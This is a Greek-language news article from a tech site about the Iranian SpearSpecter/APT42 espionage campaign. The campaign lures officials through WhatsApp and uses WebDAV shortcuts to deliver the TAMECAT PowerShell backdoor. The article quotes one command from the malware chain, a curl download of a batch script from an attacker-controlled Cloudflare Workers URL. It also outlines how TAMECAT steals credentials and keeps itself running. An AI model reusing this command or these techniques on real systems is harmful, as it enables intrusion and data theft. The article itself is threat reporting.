By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
TechReport.grTechReport.grTechReport.gr
Search
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Reading: Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής
Share
Sign In
Notification Show More
Font ResizerAa
TechReport.grTechReport.gr
Font ResizerAa
Search
Have an existing account? Sign In
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
TechReport.gr > Security > Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής
Security

Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής

Marizas Dimitris
Last updated: 17 Νοεμβρίου 2025 15:03
Marizas Dimitris
Share
SHARE


Μια επικίνδυνη εκστρατεία κατασκοπείας στοχεύει ανώτερους κυβερνητικούς και αμυντικούς αξιωματούχους σε όλο τον κόσμο. Ιρανοί χάκερ χρησιμοποιούν ψεύτικες προσκλήσεις για συνέδρια και αιτήματα συνάντησης για να ξεγελάσουν τα θύματα.

Οι επιτιθέμενοι ξοδεύουν εβδομάδες χτίζοντας εμπιστοσύνη πριν χτυπήσουν. Απευθύνονται μέσω WhatsApp για να κάνουν τα μηνύματά τους να φαίνονται νόμιμα.

Αυτή η καμπάνια, γνωστή ως SpearSpecter, συνδυάζει την υπομονή με ισχυρό κακόβουλο λογισμικό για την κλοπή ευαίσθητων πληροφοριών.

Οι δράστες εργάζονται για τον Οργανισμό Πληροφοριών του Σώματος των Φρουρών της Ισλαμικής Επανάστασης του Ιράν. Λειτουργούν με διάφορα ονόματα όπως APT42, Mint Sandstorm, Educated Manticore και CharmingCypress.

Ο κύριος στόχος τους είναι να κλέβουν ευαίσθητες πληροφορίες από άτομα με πρόσβαση σε κυβερνητικά μυστικά. Αυτό που κάνει αυτή την ομάδα επικίνδυνη είναι το πώς προσαρμόζουν τις μεθόδους τους και χρησιμοποιούν τόσο κλοπή διαπιστευτηρίων όσο και μακροπρόθεσμα εργαλεία κατασκοπείας.

Ερευνητές ασφάλειας της Εθνικής Ψηφιακής Υπηρεσίας του Ισραήλ αναγνωρισθείς το κακόβουλο λογισμικό και αποκάλυψε το εύρος λειτουργίας. Η καμπάνια τρέχει εδώ και μήνες χωρίς σημάδια διακοπής.

Οι επιτιθέμενοι στοχεύουν τόσο αξιωματούχους όσο και μέλη της οικογένειας για να αυξήσουν την πίεση και να βρουν νέα σημεία εισόδου.

Προηγμένη μόλυνση μέσω WebDAV και PowerShell

Η μόλυνση ξεκινά όταν τα θύματα λαμβάνουν έναν σύνδεσμο που ισχυρίζεται ότι είναι ένα σημαντικό έγγραφο για μια συνάντηση. Όταν κάνετε κλικ, ο σύνδεσμος ανακατευθύνεται σε ένα αρχείο στο OneDrive.

Οι εισβολείς κάνουν κατάχρηση του πρωτοκόλλου αναζήτησης-ms των Windows για να ενεργοποιήσουν ένα αναδυόμενο παράθυρο που ζητά από τους χρήστες να ανοίξουν την Εξερεύνηση των Windows. Εάν τα θύματα αποδεχτούν, ο υπολογιστής τους συνδέεται με τον διακομιστή WebDAV του εισβολέα.

Ο διακομιστής WebDAV εμφανίζει κάτι που μοιάζει με αρχείο PDF, αλλά στην πραγματικότητα είναι μια κακόβουλη συντόμευση. Όταν ανοίξει, αυτή η συντόμευση εκτελεί κρυφές εντολές που πραγματοποιούν λήψη ενός σεναρίου δέσμης από το Cloudflare Workers χρησιμοποιώντας την ακόλουθη εντολή:-

cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
Αρχική πρόσβαση στο αρχείο LNK κοινόχρηστο μέσω WebDAV που προσποιείται ότι είναι αρχείο PDF (Πηγή – Govextra)

Το σενάριο φορτώνει το TAMECAT, ένα εξελιγμένο backdoor που βασίζεται στο PowerShell που λειτουργεί εξ ολοκλήρου στη μνήμη. Το TAMECAT χρησιμοποιεί κρυπτογράφηση AES-256 για να επικοινωνεί με διακομιστές εντολών μέσω πολλαπλών καναλιών, συμπεριλαμβανομένων της κυκλοφορίας ιστού, του Telegram και του Discord.

Το TAMECAT συλλέγει τους κωδικούς πρόσβασης του προγράμματος περιήγησης εκκινώντας τον Microsoft Edge με απομακρυσμένο εντοπισμό σφαλμάτων και αναστολή των διαδικασιών του Chrome. Καταγράφει στιγμιότυπα οθόνης κάθε δεκαπέντε δευτερόλεπτα και αναζητά έγγραφα. Όλα τα κλεμμένα δεδομένα χωρίζονται σε κομμάτια πέντε megabyte και ανεβαίνουν.

Αλυσίδα φόρτωσης In-Memory της TAMECAT (Πηγή – Govextra)

Για να επιβιώσουν οι επανεκκινήσεις, το TAMECAT δημιουργεί καταχωρήσεις μητρώου που εκτελούν αρχεία δέσμης κατά τη σύνδεση. Το κακόβουλο λογισμικό αποφεύγει τον εντοπισμό χρησιμοποιώντας αξιόπιστα προγράμματα των Windows. Οι ερευνητές βρήκαν επιτιθέμενους που χρησιμοποιούν το Cloudflare Workers για υποδομή εντολών.



VIA: cybersecuritynews.com

Το Google Chrome για να προειδοποιεί τους χρήστες πριν ανοίξουν μη ασφαλείς ιστότοπους HTTP
Η Kimwolf Android Botnet κατέλαβε 1,8 εκατομμύρια συσκευές Android παγκοσμίως
Το HarmonyOS 6 θα επεκτείνει τις δυνατότητες πολλαπλών οθονών σε tablet/PC τον Δεκέμβριο
Παραβίαση δεδομένων του Πανεπιστημίου του Πρίνστον – Η βάση δεδομένων με πληροφορίες χορηγών σε κίνδυνο
Η Samsung κάνει το Galaxy Z Fold 4, Flip 4 πιο ασφαλές με μια νέα ενημέρωση
TAGGED:chromePowerShellWhatsAppWindowsασφάλεια στον κυβερνοχώρονέα για την ασφάλεια στον κυβερνοχώρο

Sign Up For Daily Newsletter

Be keep up! Get the latest breaking news delivered straight to your inbox.
[mc4wp_form]
By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.
Share This Article
Facebook Copy Link Print
Share
ByMarizas Dimitris
Follow:
Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.
Previous Article Harry Potter: Πρώτη ματιά σε Draco Malfoy και Ron Weasley από τα γυρίσματα της σειράς! –
Next Article Β. Ζωγράφος στο “Π”: ΟΠΕΚΕΠΕ, Neuropublic και Ψηφιακή Υποτέλεια
Δεν υπάρχουν Σχόλια

Αφήστε μια απάντηση Ακύρωση απάντησης

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Stay Connected

248.1KLike
69.1KFollow
134KPin
54.3KFollow
banner banner
Create an Amazing Newspaper
Discover thousands of options, easy to customize layouts, one-click to import demo and much more.
Learn More

Latest News

«Εκπληκτική πρεμιέρα για τον Καποδίστρια: Η νέα επική συμπαραγωγή της Nova σας αφήνει άφωνους!»
«Εκπληκτική πρεμιέρα για τον Καποδίστρια: Η νέα επική συμπαραγωγή της Nova σας αφήνει άφωνους!»
Technology
«Ανανεώστε τη ζωή σας για το νέο έτος: Αυτά είναι τα 3 πράγματα που προτείνει η Marie Kondo να πετάξετε ΤΩΡΑ!»
«Ανανεώστε τη ζωή σας για το νέο έτος: Αυτά είναι τα 3 πράγματα που προτείνει η Marie Kondo να πετάξετε ΤΩΡΑ!»
Android Phones Technology
Πώς να εγκαταστήσετε νωρίς τις ενημερώσεις Xiaomi HyperOS 3 με κόλπο μετονομασίας
Πώς να εγκαταστήσετε νωρίς τις ενημερώσεις Xiaomi HyperOS 3 με κόλπο μετονομασίας
Android Phones Technology Xiaomi News
«Σοκαριστική Ιατρική Επίδοση: Γιατροί Μεταμοσχεύουν Αυτί Γυναίκας Στο Πόδι της - Η Απίστευτη Ιστορία Πίσω από την Επέμβαση!»
«Σοκαριστική Ιατρική Επίδοση: Γιατροί Μεταμοσχεύουν Αυτί Γυναίκας Στο Πόδι της – Η Απίστευτη Ιστορία Πίσω από την Επέμβαση!»
Science Technology

You Might also Like

Το MFA σας κοστίζει εκατομμύρια. Δεν Πρέπει.
Security

Το MFA σας κοστίζει εκατομμύρια. Δεν Πρέπει.

Marizas Dimitris
Marizas Dimitris
8 Min Read
Entertainment

Το Spotify λανσάρει εβδομαδιαία στατιστικά για τους χρήστες –

Marizas Dimitris
Marizas Dimitris
3 Min Read
Security

Υποτιθέμενοι διαχειριστές κακόβουλου λογισμικού Meduza Stealer συνελήφθησαν μετά από χάκαρισμα ρωσικού οργανισμού

Marizas Dimitris
Marizas Dimitris
3 Min Read
//

We influence 20 million users and is the number one business and technology news network on the planet

Quick Link

  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
  • Blog
  • My Bookmarks
  • Customize Interests
  • Home Technology
  • Contact
  • Technology Home 2
  • Technology Home 3
  • Technology Home 4
  • Technology Home 5

Support

  • Home
  • Πολιτική απορρήτου
  • Σχετικά με εμάς
  • Contact With TechReport
  • Greek Live Channels IPTV 2025

Sign Up for Our Newsletter

Subscribe to our newsletter to get our newest articles instantly!

[mc4wp_form id=”1616″]

TechReport.grTechReport.gr
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Join Us!
Subscribe to our newsletter and never miss our latest news, podcasts etc..
[mc4wp_form]
Zero spam, Unsubscribe at any time.
Welcome Back!

Sign in to your account

Username or Email Address
Password

Lost your password?